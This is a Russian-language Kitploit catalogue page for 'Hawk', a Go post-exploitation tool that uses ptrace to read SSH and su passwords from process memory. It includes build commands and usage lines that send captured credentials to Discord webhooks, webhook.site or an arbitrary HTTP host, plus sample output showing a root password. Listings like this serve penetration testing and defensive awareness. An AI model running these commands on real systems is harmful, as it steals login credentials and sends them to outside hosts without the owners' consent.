Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Hawk — Инструмент на Golang, предназначенный для эксфильтрации паролей, обнаруженных через службы sshd и su. | Kitploit
Инструменты/GitHubGitHub/prodefense/hawk
Атаки на ПаролиЭксфильтрация данныхСбор информацииПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubprodefense/hawk

Hawk

Инструмент на Golang, предназначенный для эксфильтрации паролей, обнаруженных через службы sshd и su.

Репозиторий
3868 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться



Hawk

Незаметный перехват учетных данных SSH и SU в реальном времени

Hawk отслеживает процессы sshd и su, извлекая пароли из памяти через ptrace без изменения целевых процессов. Ноль операций записи. Исключительно чтение: сбор учетных данных без изменений.

Демо

Пример

Как это работает

Hawk использует файловую систему /proc Linux для обнаружения процессов SSH и SU, затем применяет ptrace для подключения и перехвата системных вызовов. Когда происходит аутентификация по паролю, он читает пароль прямо из памяти процесса во время системного вызова write() — полностью незаметно для целевого процесса. Учетные данные передаются через вебхук или выводятся в stdout.

Глубокое погружение: Пост в блоге

Сборка

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk

Использование

Discord Webhook

Hawk автоматически определяет вебхуки Discord и отправляет форматированные сообщения:

root@kitploit:~
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

Настройка: Создайте вебхук на вашем Discord-сервере, следуя руководству Discord по вебхукам. Учетные данные появятся в вашем канале с именем хоста, именем пользователя и паролем.

Прочие вебхуки

Для других сервисов вебхуков (webhook.site, собственные серверы и т. д.):

root@kitploit:~
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id

# HTTP
./hawk http://192.168.1.100:6969/webhook

# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path

Режим stdout

Нет вебхука? Учетные данные выводятся в stdout:

root@kitploit:~
./hawk

Вывод:

root@kitploit:~
hostname=server01 username=root password=SuperSecret123

Требования

  • Система Linux с включённым ptrace
  • Файловая система /proc смонтирована
  • Права root (требуются для ptrace)

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам противозаконен. Используйте ответственно и только на тех системах, которыми вы владеете или на тестирование которых имеете явное разрешение.

Благодарности

Вдохновлено работой blendin над 3snake.

Скачать инструмент